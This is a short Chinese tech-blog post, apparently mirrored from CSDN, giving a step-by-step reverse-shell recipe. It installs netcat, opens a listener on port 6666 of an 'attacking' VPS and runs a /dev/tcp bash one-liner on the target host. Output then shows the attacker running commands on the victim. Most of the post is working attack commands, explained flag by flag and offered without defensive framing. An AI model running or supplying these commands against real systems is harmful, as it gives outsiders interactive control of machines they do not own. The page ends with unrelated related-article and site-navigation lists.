码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • shell反弹


    安装nc

    yum -y install nc

    在vps(用于攻击机器)机器监听6666端口,本机器ip地址为192.168.2.200

    nc -lvnp 6666

     需要开放vps的端口

    1. [root@localhost sc]# firewall-cmd --zone=public --add-port=6666/udp --permanent
    2. success
    3. [root@localhost sc]# firewall-cmd --reload
    4. success

    在被攻击方机器执行(192.168.26.131)

    bash -c 'exec bash -i &>/dev/tcp/192.168.2.200/6666 <&1'

    解释
    #bash -i 打开一个交互的bash
    # >& 将标准错误输出重定向到标准输出
    #/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port
    # 0>&1 标准输入重定向到标准输出,实现你与反弹出来的shell的交互

    在vps执行任意命令实行攻击

    1. [root@localhost gh]# ifconfig
    2. ifconfig
    3. eth0 Link encap:Ethernet HWaddr 01:0C:29:6E:37:0A
    4. inet addr:192.168.26.131 Bcast:192.168.26.255 Mask:255.255.255.0
    5. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    6. RX packets:22825 errors:0 dropped:0 overruns:0 frame:0
    7. TX packets:15829 errors:0 dropped:0 overruns:0 carrier:0
    8. collisions:0 txqueuelen:1000
    9. RX bytes:15634385 (14.9 MiB) TX bytes:10275166 (9.7 MiB)
    10. lo Link encap:Local Loopback
    11. inet addr:127.0.0.1 Mask:255.0.0.0
    12. inet6 addr: ::1/128 Scope:Host
    13. UP LOOPBACK RUNNING MTU:16436 Metric:1
    14. RX packets:394 errors:0 dropped:0 overruns:0 frame:0
    15. TX packets:394 errors:0 dropped:0 overruns:0 carrier:0
    16. collisions:0 txqueuelen:0
    17. RX bytes:40686 (39.7 KiB) TX bytes:40686 (39.7 KiB)

  • 相关阅读:
    Spring-Boot-Starter 学习笔记(1)
    报错整理---9.8
    941 · 滑动拼图
    『忘了再学』Shell基础 — 16、位置参数变量
    基于python的毕业设计学生兼职平台
    Ubuntu18.04 realsenseD435i深度摄像头外参标定的问题
    wps卸载和重新安装
    猿创征文 | Win10安全模式知识介绍,看完你就懂了
    括号相关问题
    测试网页调用本地可执行程序(续:带参数调用)
  • 原文地址:https://blog.csdn.net/MEIYOUDAO_JIUSHIDAO/article/details/126696230
  • 最新文章
  • 【JVM】编译执行与解释执行的区别是什么?JVM 使用哪种方式?
    用 Hashids 优雅解决 C 端自增 ID 暴露问题
    V8引擎 精品漫游指南--Ignition篇(上) 指令 栈帧 槽位 调用约定 内存布局 基础内容
    LLVM Pass快速入门(四):代码插桩
    milkup:桌面端 markdown AI续写和即时渲染
    基于项目工程构建SBOM(软件物料清单)的研究
    鸿蒙应用开发UI基础第二节:鸿蒙应用程序框架核心解析与实操
    .NET 中如何快速实现 List 集合去重?
    扣子Coze实战:从0到1打造抖音+小红书热点监控智能体
    浅谈数据访问层
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号